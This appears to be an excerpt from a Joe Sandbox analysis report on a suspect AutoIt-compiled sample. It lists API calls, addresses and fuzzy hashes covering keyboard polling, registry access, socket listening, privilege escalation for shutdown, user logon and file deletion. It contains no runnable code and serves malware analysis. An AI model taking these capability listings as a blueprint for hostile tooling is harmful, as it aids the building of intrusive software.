                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 8626624c24778d9d9e93ca081c8f65848ff257823d3821e2928d8a6de8504e99
                                          • Instruction ID: ffc828c026b80460c0738c2d8c5b9bf234f70020e96ae6d3b446eb3e195739c4
                                          • Opcode Fuzzy Hash: 8626624c24778d9d9e93ca081c8f65848ff257823d3821e2928d8a6de8504e99
                                          • Instruction Fuzzy Hash: 6451FF3090878829FB35DB7089957EBBFB89F92380F08459ED5C2575C3DAA49B8CC761
                                          APIs
                                            • Part of subcall function 00980E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0097FDAD,?,?), ref: 00980E31
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009804AC
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0098054B
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009805E3
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00980822
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0098082F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: 897dec919413909038fe2b5642b22eb18023b3cdd9f383243ed6d5515da40dfb
                                          • Instruction ID: 36189b68443f53b985a5535d81e1cd1290405be7648f9b3f1c9c6e506f1e35cf
                                          • Opcode Fuzzy Hash: 897dec919413909038fe2b5642b22eb18023b3cdd9f383243ed6d5515da40dfb
                                          • Instruction Fuzzy Hash: 7BE15F71604204AFCB54EF24C891E6ABBE8EFC9714F04896DF849DB3A2D731E945CB91
                                          APIs
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 9dc14662f27dac8b8db4407364cf515566da71a826bf3d340a9f192a0977ef9c
                                          • Instruction ID: b9beb0521eecded97f5975ada2fadb1d5dd0149ef5195f2f656423ee3eedca6b
                                          • Opcode Fuzzy Hash: 9dc14662f27dac8b8db4407364cf515566da71a826bf3d340a9f192a0977ef9c
                                          • Instruction Fuzzy Hash: CA21BF362042149FDB00AF24EC19B697BA8FF54711F10C029F94ADB3A2DB30AC01DB84
                                          APIs
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                            • Part of subcall function 00964A31: GetFileAttributesW.KERNEL32(?,0096370B), ref: 00964A32
                                          • FindFirstFileW.KERNEL32(?,?), ref: 009638A3
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0096394B
                                          • MoveFileW.KERNEL32(?,?), ref: 0096395E
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0096397B
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0096399D
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009639B9
                                          Strings
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: c3933cb13d233d04d03742e012025e89ffc8ff61e1c39744329414212fbb771e
                                          • Instruction ID: 04980f1585787f43cdddce11df04be942b5c3f10264b0637f13f2c7d02e5cc39
                                          • Opcode Fuzzy Hash: c3933cb13d233d04d03742e012025e89ffc8ff61e1c39744329414212fbb771e
                                          • Instruction Fuzzy Hash: CF517D3180514DAECF05EBE0DA92AEEB778AF54314F604069E406B71D1EB316F09CF61
                                          APIs
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0096F440
                                          • Sleep.KERNEL32(0000000A), ref: 0096F470
                                          • _wcscmp.LIBCMT ref: 0096F484
                                          • _wcscmp.LIBCMT ref: 0096F49F
                                          • FindNextFileW.KERNEL32(?,?), ref: 0096F53D
                                          • FindClose.KERNEL32(00000000), ref: 0096F553
                                          Strings
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: 2a841df177727929de806dab247cee05cdfa14ebbeb7cdc049e33b784e5d7d08
                                          • Instruction ID: 57188c5d462722adff5e28e49aa28cef4706068e0d5b899059d71058a8b67a22
                                          • Opcode Fuzzy Hash: 2a841df177727929de806dab247cee05cdfa14ebbeb7cdc049e33b784e5d7d08
                                          • Instruction Fuzzy Hash: 04413D71904219AFDF14EFA4DC59AEEBBB8FF45314F144466F819A2291EB309E44CB50
                                          APIs
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 68b33c1b1ed6f7ebf7e3c673c67a7552f49046aece17eade55e8cdde9340d1d8
                                          • Instruction ID: 7c039fd2aa567245e0a98788721aa7854c813b50e1064ca984ea744a32abbb9d
                                          • Opcode Fuzzy Hash: 68b33c1b1ed6f7ebf7e3c673c67a7552f49046aece17eade55e8cdde9340d1d8
                                          • Instruction Fuzzy Hash: E112BA70A00609DFCF04DFA5D981AEEB7F9FF88310F114629E846A7290EB36AD54CB51
                                          APIs
                                            • Part of subcall function 00904750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00904743,?,?,009037AE,?), ref: 00904770
                                            • Part of subcall function 00964A31: GetFileAttributesW.KERNEL32(?,0096370B), ref: 00964A32
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00963B89
                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00963BD9
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00963BEA
                                          • FindClose.KERNEL32(00000000), ref: 00963C01
                                          • FindClose.KERNEL32(00000000), ref: 00963C0A
                                          Strings
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: b3829320c805a2906d3c6aa47141de2c51c405db6971a7c91e905508adfe219a
                                          • Instruction ID: 1534afe93c20733e9fa7aaa6427d04051f171c66300c55430bc5a1694b4ca2e9
                                          • Opcode Fuzzy Hash: b3829320c805a2906d3c6aa47141de2c51c405db6971a7c91e905508adfe219a
                                          • Instruction Fuzzy Hash: F9317E3140C385AFC701EF64D8919AFB7ACAE95314F404D2DF4E5922D1EB25EA09DB63
                                          APIs
                                            • Part of subcall function 009587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095882B
                                            • Part of subcall function 009587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00958858
                                            • Part of subcall function 009587E1: GetLastError.KERNEL32 ref: 00958865
                                          • ExitWindowsEx.USER32(?,00000000), ref: 009651F9
                                          Strings
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: b53b21ca4361eec002f6156a52b4c1bd988d59c5c0d39e53af870b771f62c177
                                          • Instruction ID: 6aa05b5f73b485911f5a563e36acd9b8880d20e6e1984bf2e153d6712f011863
                                          • Opcode Fuzzy Hash: b53b21ca4361eec002f6156a52b4c1bd988d59c5c0d39e53af870b771f62c177
                                          • Instruction Fuzzy Hash: AC012B317A56116BF7286678ACBAFBB735CDB05351F220821FD23E21D2D9515C009790
                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009762DC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009762EB
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00976307
                                          • listen.WSOCK32(00000000,00000005), ref: 00976316
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00976330
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00976344
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: 71f23b1496506a89354c536aed0fcbfa8398bcde95d0393c9c2bb49d5dfa3a98
                                          • Instruction ID: b7f9f3865403b88753f83bffb02fe6e5237d336dbebbb8c7098c158637cfefd0
                                          • Opcode Fuzzy Hash: 71f23b1496506a89354c536aed0fcbfa8398bcde95d0393c9c2bb49d5dfa3a98
                                          • Instruction Fuzzy Hash: AA21BF726006049FDB10EF64C845B6EBBA9EF89720F148269F85AE73D2CB70AD01DB51
                                          APIs
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                          • _memmove.LIBCMT ref: 00950258
                                          • _memmove.LIBCMT ref: 0095036D
                                          • _memmove.LIBCMT ref: 00950414
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 93d11fc3ee1fb75c668b5945ef404f783791e82e6e862a43ffd5072950925d59
                                          • Instruction ID: 23404ee65b14bbf830efb833433ed57a2ecdbac15c27fb78bc1242d8be9e081b
                                          • Opcode Fuzzy Hash: 93d11fc3ee1fb75c668b5945ef404f783791e82e6e862a43ffd5072950925d59
                                          • Instruction Fuzzy Hash: 0F02BF70A00209DFCF04DF65D982AAEBBB5FFC4310F168469E80ADB295EB35D954CB91
                                          APIs
                                            • Part of subcall function 00902612: GetWindowLongW.USER32(?,000000EB), ref: 00902623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 009019FA
                                          • GetSysColor.USER32(0000000F), ref: 00901A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00901A61
                                            • Part of subcall function 00901290: DefDlgProcW.USER32(?,00000020,?), ref: 009012D8
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: 1ed49fd37c256f94253db6a358376e2d94078a0622d3062c7cf5a35e0a86708b
                                          • Instruction ID: 223c0c5f1cd5a9dfdaa4afebd99f2b66fee6e88adef12a6cd1caca86f0ee16bf
                                          • Opcode Fuzzy Hash: 1ed49fd37c256f94253db6a358376e2d94078a0622d3062c7cf5a35e0a86708b
                                          • Instruction Fuzzy Hash: F3A1ACB1216944BFEB39AB689C58F7F359CDF81345F14051AF602D22E2CB299D40D7B2
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0096BCE6
                                          • _wcscmp.LIBCMT ref: 0096BD16
                                          • _wcscmp.LIBCMT ref: 0096BD2B
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0096BD3C
                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0096BD6C
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                          • String ID:
                                          • API String ID: 2387731787-0
                                          • Opcode ID: 51e5a88f6249bb1df8da012bc9feb37af1643ccf768f3f1534a893ebbd4f7cca
                                          • Instruction ID: 9bb9c9713571efee3c915afb8c465e915ab99aa96993ed7766c002a767eb6f30
                                          • Opcode Fuzzy Hash: 51e5a88f6249bb1df8da012bc9feb37af1643ccf768f3f1534a893ebbd4f7cca
                                          • Instruction Fuzzy Hash: D1518DB56046029FC714DF68D4A0E9AB3E8EF89324F10451DF95ACB3A1EB30ED44CB91
                                          APIs
                                            • Part of subcall function 00977D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00977DB6
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0097679E
                                          • WSAGetLastError.WSOCK32(00000000), ref: 009767C7
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00976800
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0097680D
                                          • closesocket.WSOCK32(00000000,00000000), ref: 00976821
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: a7c48faefdf4836b19c22d3df23c9e3841241f8e7c71a33df1ef702ea5b8404a
                                          • Instruction ID: b4f7d100ac16f95b5d1acd2d632326cef5d9dda769a71e0fb4910e9e3137bd0a
                                          • Opcode Fuzzy Hash: a7c48faefdf4836b19c22d3df23c9e3841241f8e7c71a33df1ef702ea5b8404a
                                          • Instruction Fuzzy Hash: 8141D376B00600AFDB10AF248C86F6E77A8DF85714F04C558FE5AAB3C3DA709D009791
                                          APIs
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 538ddb3e0f939f274b538f5b3ce1a90085c95f76941420c8e4ea7ca88c438f85
                                          • Instruction ID: e7f01154a9eca2389c091f6bd5227544a9af8415944b45c1dbe5de2fc595aab7
                                          • Opcode Fuzzy Hash: 538ddb3e0f939f274b538f5b3ce1a90085c95f76941420c8e4ea7ca88c438f85
                                          • Instruction Fuzzy Hash: D211B231300915AFEB217F269C54B6A7B9DEF847A1B428439F845D3351DB74DD0587A0
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009580C0
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009580CA
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009580D9
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009580E0
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009580F6
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 34e3010a295a758d707f815ef3a1cc4876096861437ceb9ffbe0630b19e90eaa
                                          • Instruction ID: 8c1e982c5e6bc4b674ef2ae3fcc64b53bc3c1184c1f941b966c13fbd6701ed23
                                          • Opcode Fuzzy Hash: 34e3010a295a758d707f815ef3a1cc4876096861437ceb9ffbe0630b19e90eaa
                                          • Instruction Fuzzy Hash: F4F0623126C704EFEB108FA5EC9DE673BACEF49755B100025F945D6250DB619C45EB60
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0096C432
                                          • CoCreateInstance.OLE32(00992D6C,00000000,00000001,00992BDC,?), ref: 0096C44A
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • CoUninitialize.OLE32 ref: 0096C6B7
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 28ccc22a9c1d8ceefce61f3aab63967cb334a0e66b31ed99e4630dd69aa7b31c
                                          • Instruction ID: 0ed98173be1d449237e8b9c527a52de5badbef3b93d7648da5998705c8fe558c
                                          • Opcode Fuzzy Hash: 28ccc22a9c1d8ceefce61f3aab63967cb334a0e66b31ed99e4630dd69aa7b31c
                                          • Instruction Fuzzy Hash: BAA12AB1204205AFD700EF54C891EABB7E8EFD5354F00491DF595972E2EB71EA09CB52
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00904AD0), ref: 00904B45
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00904B57
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 7643c7c309df2738505231ac9bbb7162c377f0de6193cb40e838f31360a50286
                                          • Instruction ID: 7651dff04586e28ed058f2296269e2a1389d75b71fe60badba72f1f80d937a69
                                          • Opcode Fuzzy Hash: 7643c7c309df2738505231ac9bbb7162c377f0de6193cb40e838f31360a50286
                                          • Instruction Fuzzy Hash: 9ED01275A14713CFD720AF32D838B0676D8AF45755B1198399485D6290D674D480C754
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID:
                                          • API String ID: 674341424-0
                                          • Opcode ID: fe8f504c8542b67e48765ed8cd7e0fa125a51f1b8ae6eaf08d85c7307bae2c46
                                          • Instruction ID: ad69e2e5cdb124bc76cbdde0e7fcd8824d537b92e0e86b9258d1a7fd433ec24d
                                          • Opcode Fuzzy Hash: fe8f504c8542b67e48765ed8cd7e0fa125a51f1b8ae6eaf08d85c7307bae2c46
                                          • Instruction Fuzzy Hash: D7228AB16083059FC724DF24C881BABB7F8AFC5310F00891DF99A97292DB75E945CB92
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0097EE3D
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0097EE4B
                                            • Part of subcall function 00907DE1: _memmove.LIBCMT ref: 00907E22
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0097EF0B
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0097EF1A
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: fea689619e2cf996a7050d09bc8ecb17e4b01ac3a7ca325769b71f2deea1f29e
                                          • Instruction ID: f38babc7c8a66f7f4ca60b7c0d0610a433f23288e5a01979c8fb048807e3534e
                                          • Opcode Fuzzy Hash: fea689619e2cf996a7050d09bc8ecb17e4b01ac3a7ca325769b71f2deea1f29e
                                          • Instruction Fuzzy Hash: 6D516D72508711AFD310EF24DC85F6BB7E8EFD8710F50492DF995962A1EB70A904CB92
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0095E628
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($|
                                          • API String ID: 1659193697-1631851259
                                          • Opcode ID: f9af49a52b081053d087c2463899493f9df16d396c50530cc9601d17216e07f1
                                          • Instruction ID: a8c75cbd65c60818ef12789acac70de4aadceda4a5a375b4f114e5e764b09da8
                                          • Opcode Fuzzy Hash: f9af49a52b081053d087c2463899493f9df16d396c50530cc9601d17216e07f1
                                          • Instruction Fuzzy Hash: EE323775A007059FDB28CF2AC481A6AB7F4FF48320B15C56EE89ADB3A1D771E941CB44
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0097180A,00000000), ref: 009723E1
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00972418
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: 9743de953d1a4956069d6c152dd6c95bf4331739d233d12debb8102c7b53a34d
                                          • Instruction ID: 1aaee1cea730bcb2094582c6931f2501a206704c639ba8475d86034a6fc75fe9
                                          • Opcode Fuzzy Hash: 9743de953d1a4956069d6c152dd6c95bf4331739d233d12debb8102c7b53a34d
                                          • Instruction Fuzzy Hash: 00410672924209FFEB20DF95DC81FBB77BCEB80714F10806AF609A7251EA759E419650
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0096B40B
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0096B465
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0096B4B2
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: 9f0ac7a205dfe3161ee2ea976df9dc5ffdf12faec6d75ee0c0d6925057d91a6c
                                          • Instruction ID: 2dfee0dd172659781187da7c8223412378d2908e793279daef6d167e9aaaf9fb
                                          • Opcode Fuzzy Hash: 9f0ac7a205dfe3161ee2ea976df9dc5ffdf12faec6d75ee0c0d6925057d91a6c
                                          • Instruction Fuzzy Hash: E9217175A10108EFCB00EFA5D884EEDBBB8FF89310F1480A9E905EB362DB319955DB50
                                          APIs
                                            • Part of subcall function 00920DB6: std::exception::exception.LIBCMT ref: 00920DEC
                                            • Part of subcall function 00920DB6: __CxxThrowException@8.LIBCMT ref: 00920E01
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095882B
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00958858
                                          • GetLastError.KERNEL32 ref: 00958865
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: d8f67a6f381c0445407269161a0bf5126c48c4390e744b47b03f06767d316c3a
                                          • Instruction ID: 28eec798c2ff9760a19f9c6a28b94934eb278ce143a6eeb7076279287e2f0384
                                          • Opcode Fuzzy Hash: d8f67a6f381c0445407269161a0bf5126c48c4390e744b47b03f06767d316c3a
                                          • Instruction Fuzzy Hash: 34118FB2414305AFE718DFA4EC85D6BB7FCEB44711B20852EF85597251EB30BC448B60
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00958774
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0095878B
                                          • FreeSid.ADVAPI32(?), ref: 0095879B
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: b6964d5252fe8454401a739ae7448d4acdf452895b5e3252f032b798792df095
                                          • Instruction ID: 679b02ecfaf64e633afa71101cfa3119084f20a91811fe19d91ae50854591abe
                                          • Opcode Fuzzy Hash: b6964d5252fe8454401a739ae7448d4acdf452895b5e3252f032b798792df095
                                          • Instruction Fuzzy Hash: DAF04975A1130CBFDF00DFF4DC99AAEBBBCEF08301F1044A9A901E2281E7756A049B50
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0096C6FB
                                          • FindClose.KERNEL32(00000000), ref: 0096C72B
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 50e009f8d9d8936b24887f568e2d8ebcc1b5a22796fd5a6201d3c83d6ba4f9da
                                          • Instruction ID: 0c98f94398006fd3e755e8d967b3cd6b67917b9697a15ade329aecc09c1dec90
                                          • Opcode Fuzzy Hash: 50e009f8d9d8936b24887f568e2d8ebcc1b5a22796fd5a6201d3c83d6ba4f9da
                                          • Instruction Fuzzy Hash: 81118E726002009FDB10DF29C845A2AF7E8EF85320F00C51EF8A9C7391DB30E805CB81
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00979468,?,0098FB84,?), ref: 0096A097
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00979468,?,0098FB84,?), ref: 0096A0A9
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 9be341a06e8026403f52bdf114533c47f9ae2865f0b08b15a1d2f99e5c01adfa
                                          • Instruction ID: 7680782d9b54a25b0fd081940e0804044f66201c7322c8745941f331eaf00dc6
                                          • Opcode Fuzzy Hash: 9be341a06e8026403f52bdf114533c47f9ae2865f0b08b15a1d2f99e5c01adfa
                                          • Instruction Fuzzy Hash: CDF0A73551922DBBDB21AFA4DC48FEA776CFF09361F004166F919D7291DA309940CFA1
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00958309), ref: 009581E0
                                          • CloseHandle.KERNEL32(?,?,00958309), ref: 009581F2
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 7da603a2777b27b2b1098595c8236f035ec01b082d54271b5c6a7b89b854e637
                                          • Instruction ID: 593871ea2f5a9b01e3ce5a32d111111d073dbdb3e6301307207c8e6122b9bef2
                                          • Opcode Fuzzy Hash: 7da603a2777b27b2b1098595c8236f035ec01b082d54271b5c6a7b89b854e637
                                          • Instruction Fuzzy Hash: 05E08C32014620AFE7212B60FC08E737BEEEF44310720882DF8AAC0431CB22AC90EB10
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00928D57,?,?,?,00000001), ref: 0092A15A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0092A163
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          APIs
                                          • __time64.LIBCMT ref: 0096889B
                                            • Part of subcall function 0092520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00968F6E,00000000,?,?,?,?,0096911F,00000000,?), ref: 00925213
                                            • Part of subcall function 0092520A: __aulldiv.LIBCMT ref: 00925233
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID:
                                          • API String ID: 2893107130-0
                                          APIs
                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00964C4A
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00958389), ref: 009587D1
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0092A12A
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 0097785B
                                          • DeleteObject.GDI32(00000000), ref: 0097786D
                                          • DestroyWindow.USER32 ref: 0097787B
                                          • GetDesktopWindow.USER32 ref: 00977895
                                          • GetWindowRect.USER32(00000000), ref: 0097789C
                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009779DD
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009779ED
                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977A35
                                          • GetClientRect.USER32(00000000,?), ref: 00977A41
                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00977A7B
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977A9D
                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977AB0
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977ABB
                                          • GlobalLock.KERNEL32(00000000), ref: 00977AC4
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977AD3
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00977ADC
                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977AE3
                                          • GlobalFree.KERNEL32(00000000), ref: 00977AEE
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977B00
                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00992CAC,00000000), ref: 00977B16
                                          • GlobalFree.KERNEL32(00000000), ref: 00977B26
                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00977B4C
                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00977B6B
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977B8D
                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00977D7A
                                          Strings
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          • API String ID: 2211948467-2373415609
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,0098F910), ref: 00983627
                                          • IsWindowVisible.USER32(?), ref: 0098364B
                                          Strings
                                          Memory Dump Source
